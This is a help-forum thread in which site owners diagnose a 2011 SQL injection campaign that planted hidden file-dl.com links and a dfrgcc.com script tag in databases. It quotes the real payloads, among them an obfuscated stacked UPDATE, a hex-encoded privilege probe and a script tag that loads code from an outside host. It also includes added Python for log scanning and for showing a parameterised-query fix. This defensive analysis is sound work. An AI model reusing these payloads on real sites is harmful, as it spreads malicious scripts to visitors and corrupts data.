Solved

What's causing "file-dl.com"-link hack?

Posted on 2011-09-13
Last Modified: 2012-05-12
Look at this:
http://www.google.se/search?hl=&q=%22file-dl.com%22+crack&sourceid=navclient-ff&rlz=1B3GGHP_sv___SE434&ie=UTF-8&aq=4h&oq=

A lot of sites have been hacked with the same hidden link to file-dl.com.

What's causing this? How do they do it? How to prevent it?

Question by:Alfahane
17 Comments
 

Expert Comment

by:4allSolutions
ID: 36530606
Same question here. I'd appreciate a quick answer!
Having a problem with one SQL 2008 server; this server is not publicly accessible. Only a limited range of servers can access it. Not all of those servers are ours...

Can you tell what your environment is ?
 

Author Comment

by:Alfahane
ID: 36530772
SQL 2000
 

Author Comment

by:Alfahane
ID: 36530831
Do you have problems with several databases on one server only?
 

Expert Comment

by:4allSolutions
ID: 36531296
Only one database on one server. The server has 50 databases.
The database is accessed from outside. But I don't know for sure whether it is the external user that caused this injection or our servers.
I think (and hope) it is not one of our servers that is injecting. But I want to be sure...
 

Expert Comment

by:jdcrane
ID: 36544222
Hi guys

It'll be a simple injection attack that's gotten past one of your web-facing applications linking to the affected databases. I've just cleaned up some systems with the exact same issue.

If you're reluctant to restore to avoid data loss, i can repair the data for you fairly quickly... just contact me and we can sort something out.

I can also pinpoint and plug the vulnerability in your application for you as well so this particular issue won't happen again.

All the best :)
 

Expert Comment

by:Randy_Pr
ID: 36546445
Been having the same issue for 2 days. Not only am I seeing this in a SQL 2008 database, but it is also being added to files being written on our web server. Need help!
 

Expert Comment

by:jdcrane
ID: 36548523
In addition to repairing, I can set your system up to provide an immediate report via email. Some of the key things it shows are:
 
the attack vector (what part of your application the attacker was trying to attack),
the source IP,
the actual injection attempt,
the symbols used to help detect it, and
the corresponding URL.
Here's one of many reports that a client of mine received from attacks originating out of China just last night, partially censored for obvious reasons:


Dirty Data
Injection Vector: ivDirectQueryString
Target Type: vbString
Number of hits: 4
Value: 25 AND (CAST(IS_SRVROLEMEMBER(0X730079007300610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X64006200630072006500610074006F007200)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X620075006C006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X6400690073006B00610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_SRVROLEMEMBER(0X730065007200760065007200610064006D0069006E00)AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X7000750062006C0069006300) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006F0077006E0065007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006200610063006B00750070006F00700065007200610074006F007200) AS VARCHAR) CHAR(94) CAST(IS_MEMBER (0X640062005F006400610074006100770072006900740065007200) AS VARCHAR))=0 
Referring Page:
Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
IP: 123.11.252.18(direct:123.11.252.18)
URL: /path/subpath/page.asp?id=25 and (cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x64006200630072006500610074006F007200)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x620075006C006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x6400690073006B00610064006D0069006E00)as varchar)+char(94)+cast(IS_SRVROLEMEMBER(0x730065007200760065007200610064006D0069006E00)as varchar)+char(94)+cast(IS_MEMBER (0x7000750062006C0069006300) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006F0077006E0065007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006200610063006B00750070006F00700065007200610074006F007200) as varchar)+char(94)+cast(IS_MEMBER (0x640062005F006400610074006100770072006900740065007200) as varchar))=0 
Symbols: cast / varchar / = / (0x

 

Expert Comment

by:pysak
ID: 36567705
A website of mine has been affected by this issue. I restored the database and ensured that ONLY parameterised queries are used throughout the website.

Today the website has been targeted again, this time with:
</title><script src=http://dfrgcc.com/ur.php></script>

There is no relevant information in the event log. Does anyone know what is causing this?
 

Expert Comment

by:jdcrane
ID: 36567890
G'day mate

Yes, you still have a vulnerability in your application. There is no "answer" for this, you'll need to review your application more closely in order to find the problem.

Cheers
 

Accepted Solution

by:jdcrane
jdcrane earned 375 total points
ID: 36569910
</title><a style=position:absolute;left:-9999px;top:-9999px; href=http://file-dl.com/show.php?id=2 >crack</a>
</title><script src=http://dfrgcc.com/ur.php></script>

There are a few things you'd need to do in order to rid yourself of the above permanently. They are:

1. If you want to retain data created since the attack occurred, take any website that links to the database(s) concerned offline.

2. Review your logs to determine where the attack vector was, e.g. URL querystring etc.; it's OK if you can't see anything.

3. Review your code in detail and resolve the vulnerabilities; the location of the injected content will assist with determining where the vulnerabilities are in your application.

4. Repair the data or restore a database backup, the latter only if you don't want to retain new data created since the attack occurred.

5. Put your site(s) back online.
<advertising link removed by RockMod 20 Sept '11>
 

Expert Comment

by:pysak
ID: 36572859
For anyone that is experiencing this problem, here is an entry from the website log:

(815  ) 2011-09-20 12:00:39 192.168.x.x GET /affected-page.aspx id=631'+update+DatabaseTableName+set+NameOfClient=cast(ClientName+as+varchar(8000))%2Bcast(char(60)%2Bchar(47)%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)%2Bchar(47)%2Bchar(100)%2Bchar(102)%2Bchar(114)%2Bchar(103)%2Bchar(99)%2Bchar(99)%2Bchar(46)%2Bchar(99)%2Bchar(111)%2Bchar(109)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000))-- 80 - 81.134.4.218 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0;+en-US;+rv:1.4)+Gecko/20780624+Netscape/7.1+(ax) 200 0 0

This is very similar to the LizaMoon hack a few months ago.

As you can see, the querystring contains ASCII character codes to disguise the query.

I have used a parameterised query on this page, restricting the input to int (integer).

The id querystring is also inspected to ensure it is an integer before the SqlCommand is run against the database; this does not prevent the hack.

Any ideas?
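
As an added example (not code from the original thread or from any of the people posting in it), the Python below does the log review jdcrane's step 2 asks for and makes the log entry above readable: it undoes the two obfuscations seen in this thread, the char(n)+char(n)+... concatenation in pysak's querystring and the 0x... UTF-16 hex literals in the IS_SRVROLEMEMBER/IS_MEMBER probe from jdcrane's report, and runs a simple indicator check over a few constructed IIS-style log lines. The log lines, IP addresses, table and column names are constructed placeholders, and the field order assumed is the default W3C layout (date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status); the payload shapes are the ones posted in the thread.

```python
import re
from urllib.parse import unquote_plus

# The string the injected UPDATE appends to every text column, as quoted in
# the thread. Used here only to build the constructed sample log line.
INJECTED_TAG = "</title><script src=http://dfrgcc.com/ur.php></script>"


def char_chain(text: str) -> str:
    """Encode text the way the logged payload does: char(n)%2Bchar(n)%2B...
    %2B is a literal '+', i.e. T-SQL string concatenation; a bare '+' in a
    query string decodes to a space, which the attacker uses as SQL whitespace."""
    return "%2B".join(f"char({ord(c)})" for c in text)


# Constructed IIS-style log lines (placeholders, not data from the thread):
# a benign request, the stacked UPDATE, and the role-membership probe.
SAMPLE_LOG = "\n".join([
    "2011-09-20 12:00:12 192.168.0.10 GET /affected-page.aspx id=631 80 - "
    "10.0.0.5 Mozilla/5.0+(Windows) 200 0 0",
    "2011-09-20 12:00:39 192.168.0.10 GET /affected-page.aspx "
    "id=631'+update+Clients+set+ClientName=cast(ClientName+as+varchar(8000))%2Bcast("
    + char_chain(INJECTED_TAG)
    + "+as+varchar(8000))-- 80 - 10.0.0.6 Mozilla/5.0+(Windows;+U;+Windows+NT+5.0) 200 0 0",
    "2011-09-20 12:01:02 192.168.0.10 GET /page.asp "
    "id=25+and+(cast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00)+as+varchar))=0"
    " 80 - 10.0.0.7 Mozilla/4.0+(compatible;+MSIE+6.0) 200 0 0",
])

# \b keeps varchar(8000) from being read as char(8000).
CHAR_CHAIN_RE = re.compile(r"(?i)\bchar\(\s*\d+\s*\)(?:\s*\+\s*\bchar\(\s*\d+\s*\))*")
CHAR_RE = re.compile(r"(?i)\bchar\(\s*(\d+)\s*\)")
HEX_RE = re.compile(r"0[xX]((?:[0-9A-Fa-f]{2})+)")


def decode_char_chain(sql: str) -> str:
    """Collapse char(60)+char(47)+... into the quoted literal it builds."""
    def repl(m):
        return "'" + "".join(chr(int(c)) for c in CHAR_RE.findall(m.group(0))) + "'"
    return CHAR_CHAIN_RE.sub(repl, sql)


def decode_hex_literal(sql: str) -> str:
    """Turn 0x... literals back into text. The role names in the probe are
    UTF-16LE (every second byte is 0x00); anything else is tried as ASCII
    and left untouched if that fails."""
    def repl(m):
        raw = bytes.fromhex(m.group(1))
        if raw and len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2]):
            return "'" + raw.decode("utf-16-le") + "'"
        try:
            return "'" + raw.decode("ascii") + "'"
        except UnicodeDecodeError:
            return m.group(0)
    return HEX_RE.sub(repl, sql)


def deobfuscate(cs_uri_query: str) -> str:
    """URL-decode the query field, then undo char() chains and hex literals."""
    return decode_hex_literal(decode_char_chain(unquote_plus(cs_uri_query)))


# Indicators are matched on the URL-decoded (still obfuscated) query text.
INDICATORS = [
    ("stacked statement", re.compile(r"(?i)\b(update|insert|delete|exec|declare|drop)\b")),
    ("cast/convert", re.compile(r"(?i)\b(cast|convert)\s*\(")),
    ("obfuscation", re.compile(r"(?i)\bchar\s*\(|0x[0-9a-f]{8,}")),
    ("privilege probe", re.compile(r"(?i)\bis_(srvrolemember|member)\s*\(")),
    ("comment terminator", re.compile(r"--|/\*")),
    ("quote break-out", re.compile(r"'")),
]


def parse_log_line(line: str):
    """Split one W3C log line into the fields the scan needs; None for
    directive lines and lines too short to carry a request."""
    f = line.split()
    if len(f) < 11 or f[0].startswith("#"):
        return None
    return {"date": f[0], "time": f[1], "method": f[3], "stem": f[4],
            "query": f[5], "client_ip": f[8], "agent": f[9], "status": f[10]}


def scan_log(text: str) -> list:
    """Return requests matching at least two indicators, with the query
    deobfuscated so the analyst can read what the attacker actually ran."""
    findings = []
    for line in text.splitlines():
        rec = parse_log_line(line)
        if rec is None:
            continue
        raw = unquote_plus(rec["query"])
        hits = [name for name, rx in INDICATORS if rx.search(raw)]
        if len(hits) >= 2:  # a lone quote in a search term is normal traffic
            findings.append({**rec, "indicators": hits,
                             "decoded": decode_hex_literal(decode_char_chain(raw))})
    return findings


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["client_ip"], hit["stem"], hit["indicators"])
        print("   ", hit["decoded"])
```

Run against a real log, the decoded field is what tells you the two things the thread asks about: the cast(... as varchar(8000)) around every column value is there so the appended tag survives the column's width, and the hex literals in the earlier probe decode to role names (sysadmin, dbcreator, bulkadmin, diskadmin, serveradmin, public, db_owner, db_backupoperator, db_datawriter), so the attacker was checking what the web application's database login could do before sending the UPDATE. The two-indicator threshold is a choice, not a rule: a lone quote or a lone "update" in a search box is ordinary traffic, but "update" together with a comment terminator in an id parameter is not.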
 

Assisted Solution

by:jdcrane
jdcrane earned 375 total points
ID: 36573405
Deploy a test version of your site and debug the same request. I think you'll find that if this was in fact the successful injection that corrupted your system, you can't be vetting the querystring properly; also, depending on how you parameterised the query or SP, it may not protect you from injection. If DatabaseTableName and NameOfClient are literals, they have to be retrieved from somewhere, otherwise it's a remarkably accurate guess (i.e. you were targeted). You might find there's another injection that pulls back or transmits the result to the attacking client for parsing and follow-up injections like the above.
 

Assisted Solution

by:lherrou
lherrou earned 125 total points
ID: 36573550
And don't forget, once you've completed your recovery in your database, check around for other backdoors that the hackers may have left. I've seen that more than once, where they leave a new directory or file with a file uploader tool, etc to give them access again.
 

Expert Comment

by:nhmedia
ID: 36597918
Would it improve matters if you restricted the number of characters in the QS parameter? I.e. your code would only run if the parameter was an integer AND fewer than ten chars?
I ask because we face the same issue.
KR
 

Assisted Solution

by:jdcrane
jdcrane earned 375 total points
ID: 36599510
If you're expecting an integer from a web parameter, you should be using the value returned from your conversion function (e.g. int, intval), not the parameter directly.

If you're expecting a non-numeric string literal, it's best to be fishing for SQL injection symbols and halting further action upon detection of suspicious activity. If you can't post source and sample querystrings, your particular circumstances won't be exempt from the techniques referred to in the many in-depth guides out there for protecting yourself from injection.
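
To show the point jdcrane makes above (use the converted integer, never the raw parameter) next to nhmedia's length-limit question and pysak's id parameter, here is an added Python example that is not from the thread and not any participant's code. It uses sqlite3 as a stand-in for the SQL Server database in the posts, with a constructed Clients table; the table and column names are placeholders. The payload is a transliteration of the one in pysak's log: sqlite needs a ';' before the second statement and '||' for concatenation where T-SQL accepts a bare second statement in the batch and '+', and the char() chain is replaced by the literal it decodes to.

```python
import re
import sqlite3

# The tag the thread's injected UPDATE appends to text columns.
INJECTED_TAG = "</title><script src=http://dfrgcc.com/ur.php></script>"

# Transliteration of the logged payload for sqlite (see lead-in). The shape is
# the same: close the quote, add a statement, comment out the rest of the query.
PAYLOAD = "631'; update Clients set ClientName = ClientName || '" + INJECTED_TAG + "' --"


def fresh_db() -> sqlite3.Connection:
    """In-memory stand-in for the thread's SQL Server table (constructed rows)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Clients (id INTEGER PRIMARY KEY, ClientName TEXT)")
    con.executemany("INSERT INTO Clients VALUES (?, ?)", [(630, "Acme"), (631, "Globex")])
    con.commit()
    return con


def build_vulnerable_sql(raw_id: str) -> str:
    """The pattern that gets hit: the querystring value is pasted into the SQL text."""
    return "SELECT ClientName FROM Clients WHERE id='" + raw_id + "'"


def lookup_vulnerable(con: sqlite3.Connection, raw_id: str) -> str:
    """Run the concatenated text as a batch and return the SQL that was sent.
    executescript() is used on purpose: SQL Server executes the whole batch,
    so the stacked UPDATE runs; sqlite3's execute() would refuse a second
    statement and mask the bug that the thread is about."""
    sql = build_vulnerable_sql(raw_id)
    con.executescript(sql)
    return sql


ID_RE = re.compile(r"[0-9]{1,9}")  # plain decimal digits, bounded length


def parse_id(raw):
    """Strict conversion: an int for a plain decimal id, otherwise None.
    Only this return value is ever used in SQL, never the raw parameter."""
    if not isinstance(raw, str) or ID_RE.fullmatch(raw.strip()) is None:
        return None
    return int(raw.strip())


def lookup_hardened(con: sqlite3.Connection, raw_id):
    """Typed parameter through a placeholder; the SQL text never contains input."""
    cid = parse_id(raw_id)
    if cid is None:
        return None  # reject and log the attempt; do not "clean" it and continue
    row = con.execute("SELECT ClientName FROM Clients WHERE id = ?", (cid,)).fetchone()
    return row[0] if row else None


def tainted_rows(con: sqlite3.Connection) -> int:
    """How many rows carry the injected tag (the check to run during clean-up)."""
    return con.execute(
        "SELECT count(*) FROM Clients WHERE ClientName LIKE '%<script%'"
    ).fetchone()[0]


if __name__ == "__main__":
    db = fresh_db()
    print(lookup_vulnerable(db, PAYLOAD))
    print("tainted rows after vulnerable lookup:", tainted_rows(db))  # every row
    db = fresh_db()
    print("hardened lookup with payload:", lookup_hardened(db, PAYLOAD))  # None
    print("hardened lookup with 631:", lookup_hardened(db, "631"))
    print("tainted rows after hardened lookup:", tainted_rows(db))
```

The UPDATE has no WHERE clause, which is why every row in the table (and, in the thread's case, every text column in every table the login could write) ends up carrying the tag. A length cap like the one nhmedia suggests narrows what an attacker can send but does not change the class of bug; the fix is that the handler only ever passes the integer returned by parse_id as a bound parameter, so a quote in the input never reaches the SQL parser. A SP or "parameterised" wrapper that builds dynamic SQL from its arguments internally is still the vulnerable case, which is the caveat jdcrane raises.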
 

Author Closing Comment

by:Alfahane
ID: 36948014
I'm asked by EE to close this question as it has been given the status "Abandoned".

I guess we can all agree that there is not one simple way to solve this problem, other than review our programming code more and hope that next clever hack will not come too soon.
